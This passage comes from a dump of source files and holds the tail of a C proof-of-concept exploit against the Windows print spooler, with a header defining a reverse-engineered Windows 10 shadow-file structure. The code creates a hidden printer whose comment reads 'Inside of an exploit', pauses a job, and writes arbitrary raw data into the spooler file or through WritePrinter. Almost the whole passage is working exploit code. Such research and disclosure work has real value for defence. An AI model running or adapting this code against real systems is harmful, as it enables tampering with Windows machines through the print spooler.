CleanupPath;\n }\n\n //\n // Now create a printer to attach to this port\n // This data must be valid and match what we created earlier\n //\n ZeroMemory(&printerInfo, sizeof(printerInfo));\n printerInfo.pPortName = g_PortName;\n printerInfo.pDriverName = g_DriverName;\n printerInfo.pPrinterName = g_PrinterName;\n\n //\n // This data must always be as indicated here\n //\n printerInfo.pPrintProcessor = L\"WinPrint\";\n printerInfo.pDatatype = L\"RAW\";\n\n //\n // This part is for fun/to find our printer easily\n //\n printerInfo.pComment = L\"I'd be careful with this one...\";\n printerInfo.pLocation = L\"Inside of an exploit\";\n printerInfo.Attributes = PRINTER_ATTRIBUTE_RAW_ONLY | PRINTER_ATTRIBUTE_HIDDEN;\n printerInfo.AveragePPM = 9001;\n hPrinter = AddPrinter(NULL, 2, (LPBYTE)&printerInfo);\n if (hPrinter == NULL)\n {\n printf(\"Failed to create printer: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n }\n\n //\n // Purge the printer of any previous jobs\n //\n bRes = SetPrinter(hPrinter, 0, NULL, PRINTER_CONTROL_PURGE);\n if (bRes == FALSE)\n {\n printf(\"Failed to purge jobs: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Are we printing with GDI, or with the spooler?\n //\n if (bPrintWithSpooler == TRUE)\n {\n //\n // Manually add a new job\n //\n bRes = AddJob(hPrinter, 1, (LPBYTE)&job, sizeof(job), &dwNeeded);\n if (bRes == FALSE)\n {\n printf(\"Failed to add job: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Save the Job ID\n //\n dwJobId = job.jobInfo.JobId;\n }\n else\n {\n //\n // Use the GDI API to start a new print job\n //\n docInfo.pDatatype = L\"RAW\";\n docInfo.pOutputFile = NULL;\n docInfo.pDocName = L\"Ignore Me\";\n dwJobId = StartDocPrinter(hPrinter, 1, (LPBYTE)&docInfo);\n }\n\n //\n // Pause it, so it never actually prints\n //\n printf(\"[+] Created Job ID: %d\\n\", dwJobId);\n bRes = SetJob(hPrinter, dwJobId, 0, NULL, JOB_CONTROL_PAUSE);\n if (bRes == FALSE)\n {\n printf(\"[-] Failed to pause job: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Check if we're manually printing or using the GDI API\n //\n if (bPrintWithSpooler == TRUE)\n {\n //\n // Open the spooler file\n //\n printf(\"[.] Opening spooler job: %S\\n\", job.jobInfo.Path);\n hSpool = CreateFile(job.jobInfo.Path,\n GENERIC_WRITE,\n 0,\n NULL,\n CREATE_NEW,\n 0,\n NULL);\n if (hSpool == INVALID_HANDLE_VALUE)\n {\n printf(\"[-] Failed to open spooler file: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Write the data\n //\n bRes = WriteFile(hSpool,\n printerData,\n (DWORD)strlen(printerData),\n &dwNeeded,\n NULL);\n if (bRes == FALSE)\n {\n printf(\"[-] Failed to write the spooler data: %lx\\n\", GetLastError());\n CloseHandle(hSpool);\n goto CleanupPath;\n }\n\n //\n // Done with the spooler file and schedule it\n //\n CloseHandle(hSpool);\n ScheduleJob(hPrinter, dwJobId);\n }\n else\n {\n //\n // Write the data\n //\n bRes = WritePrinter(hPrinter,\n printerData,\n (DWORD)strlen(printerData),\n &dwNeeded);\n if (bRes == FALSE)\n {\n printf(\"[-] Failed to write the spooler data: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Schedule the job for spooling\n //\n EndDocPrinter(hPrinter);\n }\n\n //\n // Wait for the client to read it\n //\n printf(\"[+] Launch client... and press ENTER after\\n\");\n getchar();\n\nCleanupPath:\n //\n // Now delete the printer and close the handle\n //\n if (hPrinter != NULL)\n {\n bRes = DeletePrinter(hPrinter);\n if (bRes == FALSE)\n {\n //\n // Non fatal, this is the cleanup path\n //\n printf(\"[-] Failed to delete printer: %lx\\n\", GetLastError());\n }\n printf(\"[+] Printer deleted\\n\");\n ClosePrinter(hPrinter);\n }\n\n //\n // Cleanup our port\n //\n if (hMonitor != NULL)\n {\n dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n bRes = XcvData(hMonitor,\n L\"DeletePort\",\n (LPBYTE)g_PortName,\n dwNeeded,\n NULL,\n 0,\n &dwNeeded,\n &dwStatus);\n if (bRes == FALSE)\n {\n //\n // Non fatal, this is the cleanup path\n //\n printf(\"[-] Failed to delete port: %lx\\n\", GetLastError());\n }\n\n //\n // Close the monitor port\n //\n printf(\"[+] Port deleted\\n\");\n ClosePrinter(hMonitor);\n }\n return 0;\n}\n" }, { "path": "shdfile4.h", "content": "/*++\n\n Copyright (C) Alex Ionescu. All rights reserved.\n Copyright (C) Microsoft Corporation. All rights reserved.\n\nModule Name:\n\n shdfile4.h\n\nAbstract:\n\n Contains the definition of SHADOWFILE_4 reverse engineered for Windows 10\n\nEnvironment:\n\n User Mode\n\nRevision History:\n\n Added definition for Windows 10 Shadow Files - ionescu007 - 12 May 20\n\n--*/\n\n#define SF_SIGNATURE_4 0x5123 /* 'Q#' is the signature value */\n#define SF_VERSION_4 4\ntypedef struct _SHADOWFILE_4\n{\n DWORD signature;\n DWORD HeaderSize;\n DWORD Status;\n DWORD JobId;\n DWORD Priority;\n LPWSTR pNotify;\n LPWSTR pUser;\n LPWSTR pDocument;\n LPWSTR pOutputFile;\n LPWSTR pPrinterName;\n LPWSTR pDriverName;\n LPDEVMODE pDevMode;\n LPWSTR pPrintProcName;\n LPWSTR pDatatype;\n LPWSTR pParameters;\n SYSTEMTIME Submitted;\n DWORD StartTime;\n DWORD UntilTime;\n DWORD Size;\n DWORD cPages;\n DWORD cbSecurityDescriptor;\n PSECURITY_DESCRIPTOR pSecurityDescriptor;\n DWORD NextJobId;\n DWORD Version;\n DWORD dwReboots;\n LPWSTR pMachineName;\n DWORD TotalSize;\n LPWSTR pUserSid;\n LPWSTR pFilePool;\n DWORD SizeHigh;\n DWORD TotalSizeHigh;\n DWORD NamedPropertiesSize;\n LPWSTR NamedProperties;\n} SHADOWFILE_4, *PSHADOWFILE_4;\n#ifdef _M_AMD64\nC_ASSERT(sizeof(SHADOWFILE_4) == 0xE0);\n#endif\n" } ]